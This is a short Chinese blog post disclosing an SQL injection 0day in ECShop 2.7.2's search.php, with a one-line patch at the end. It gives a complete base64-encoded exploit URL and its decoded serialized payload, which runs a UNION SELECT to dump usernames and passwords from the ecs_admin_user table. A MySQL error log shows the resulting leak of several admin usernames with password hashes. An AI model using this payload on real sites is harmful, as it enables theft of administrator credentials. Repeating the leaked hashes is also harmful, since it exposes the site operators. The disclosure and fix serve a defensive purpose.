search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code

base64_decode后的语句！
a:1:{s:4:”attr”;a:1:{s:125:”1′) and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'”\’) union select 1#”‘),1 from ecs_admin_user#”;s:1:”1″;}}

今天在一个0day上看到。 本地环境测试2.7.2. 直接包曝出。。。希望大家注意。尽快修补。我刚刚入从C#转入php能力不够，望高手修补。影响还是比较大的！

MySQL server error report:Array(    [0] => Array        (            [message] => MySQL Query Error        )    [1] => Array        (            [sql] => SELECT g.goods_id, g.goods_name, g.market_price, g.is_new, g.is_best, g.is_hot, g.shop_price AS org_price, IFNULL(mp.user_price, g.shop_price * ‘1’) AS shop_price, g.promote_price, g.promote_start_date, g.promote_end_date, g.goods_thumb, g.goods_img, g.goods_brief, g.goods_type FROM `ecshop`.`ecs_goods` AS g LEFT JOIN `ecshop`.`ecs_member_price` AS mp ON mp.goods_id = g.goods_id AND mp.user_rank = ‘0’ WHERE g.is_delete = 0 AND g.is_on_sale = 1 AND g.is_alone_sale = 1  AND g.goods_id IN (‘dsktt:f1848c3adc916b8ccf6759ae29f5bfe8″‘) union select 1#”‘,’bjgonghuo1:d0c015b6eb9a280f318a4c0510581e7e”‘) union select 1#”‘,’shhaigonghuo1:4146fecce77907d264f6bd873f4ea27b”‘) union select 1#”‘)  AND (( 1  )  ) ORDER BY goods_id DESC LIMIT 10        )    [2] => Array        (            [error] => The used SELECT statements have a different number of columns        )    [3] => Array        (            [errno] => 1222        ))

解决方案

search.php
大概300 源
            if (is_not_null($val) )
修改为
            if (is_not_null($val) && is_numeric($key))
就可以了

本文地址：http://www.jwzzsw.com/archives/744.html